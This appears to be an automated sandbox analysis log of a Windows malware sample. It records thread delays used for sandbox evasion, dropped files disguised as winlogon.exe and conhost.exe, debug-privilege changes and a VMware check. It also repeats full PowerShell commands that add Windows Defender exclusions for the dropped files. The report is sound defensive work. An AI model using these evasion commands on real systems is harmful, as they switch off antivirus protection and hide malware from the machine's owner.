                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\Public\AccountPictures\winlogon.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 30000
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 600000
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 599781
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 598843
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 598625
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 598500
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 598343
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 3600000
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 597578
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 597359
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 597208
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 597068
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596906
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596761
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596640
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 300000
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596468
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596347
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596218
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596108
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 595988
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 595859
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 595721
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 595580
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 595125
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594822
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594669
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594495
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594387
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594278
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594171
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594062
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593950
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593842
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593734
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593625
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593509
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593399
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593296
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593187
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593078
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 592968
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 592859
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 592726
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 592512
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591978
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591858
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591749
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591640
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591528
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591420
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591309
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591177
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591048
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590916
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590773
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590656
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590546
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590437
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590326
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590201
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590093
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: conhost.exe.0.drBinary or memory string: Npj6rKbVmcI0q3q9CKlU
                            Source: 4si9noTBNw.exe, 00000000.00000002.1825343153.000000001BD56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}sses\C
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess token adjusted: Debug
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeProcess token adjusted: Debug
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeProcess token adjusted: Debug
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Adds a directory exclusion to Windows Defender
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe'
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\VTixufCejPQZEvXiB.exe'
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\VTixufCejPQZEvXiB.exe'
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\winlogon.exe'
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\en-GB\conhost.exe'
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4si9noTBNw.exe'
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\VTixufCejPQZEvXiB.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\VTixufCejPQZEvXiB.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\winlogon.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\en-GB\conhost.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4si9noTBNw.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\VTixufCejPQZEvXiB.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\VTixufCejPQZEvXiB.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\winlogon.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\en-GB\conhost.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4si9noTBNw.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\csCDqY6YZN.bat" Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES39B.tmp" "c:\Windows\System32\CSC5AB1265740184DDC93ABA6EF26458DB.TMP"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\en-GB\conhost.exe "C:\Program Files\Windows Defender\en-GB\conhost.exe"
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Users\user\Desktop\4si9noTBNw.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeQueries volume information: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe VolumeInformationJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeQueries volume information: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe VolumeInformationJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeQueries volume information: C:\Users\Public\AccountPictures\winlogon.exe VolumeInformationJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeQueries volume information: C:\Users\Public\AccountPictures\winlogon.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
